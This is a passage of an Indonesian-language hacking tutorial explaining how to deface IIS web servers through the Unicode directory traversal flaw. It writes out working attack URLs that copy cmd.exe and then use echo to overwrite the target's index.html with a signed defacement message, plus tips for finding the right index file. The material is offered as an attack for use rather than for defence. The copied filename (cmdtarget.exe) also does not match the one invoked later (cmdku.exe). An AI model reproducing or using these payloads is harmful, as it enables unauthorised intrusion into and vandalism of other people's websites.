www.namaterget.com/scripts/..%e0%80%af../winnt
/system32/cmd.exe?/c+copy+c:\winnt\ system32\cmd.exe+c:\winnt\system32\cmdtarget.exe
Tujuan kita mengkopi
dan mengubah cmd.exe menjadi cmdtarget.exe adalah agar kita bisa
menjalankan perintah echo. Jika anda menggunakan cmd.exe, perintah
echo tidak bisa digunakan untuk menulis atau membuat file. Sekarang
kita sudah bisa melakukan defacing situs target. Selanjutnya, kita
akan melakukan deface menggunakan perintah "echo". Cara seperti
ini adalah cara yang paling mudah, karena kita tidak perlu upluad
file ke webserver sasaran. Perintah echo dapat digunakan untuk menulis
pesan dan kemudian disimpan ke suatu file. Misalkan, Anda akan deface
situs sasaran dengan pesan:
cYbeR
ObAke Was Here
Deface
by Dirik0e
PATch
YoUr SysteM NoW !!!
Ketikkan perintah sebagai berikut ini:
www.namatarget.com/scripts/..%c1%9c../winnt/system32/cmdku.exe?/c+echo++"<html>
<head><title>DefacE by: Dirik0e </title></head><H1><marquee>cYbeR
obAke Was Here </h1></marquee><br><br><br><body><h4>Deface
By: DiRiK0e </h4><br><br><br><br><h2>
PatCh YouR sYstEm NoW !!! </h2> "+>+c:\inetpub\wwwroot\index.html
Sekarang
anda dapat membuka web yang telah anda deface. Jika file wwwroot
files-nya bernama default.html, Akan segera terlihat hasilnya. Namun,
jika anda tidak melihat hasilnya, wwwroot files-nya bukan bernama
default.html. Sebenarnya, banyak sekali nama file wwwrootnya, seperti
index.htm, index.asp, default.htm,atau file lain yang telah ditentukan
oleh si webmaster dari webserver tersebut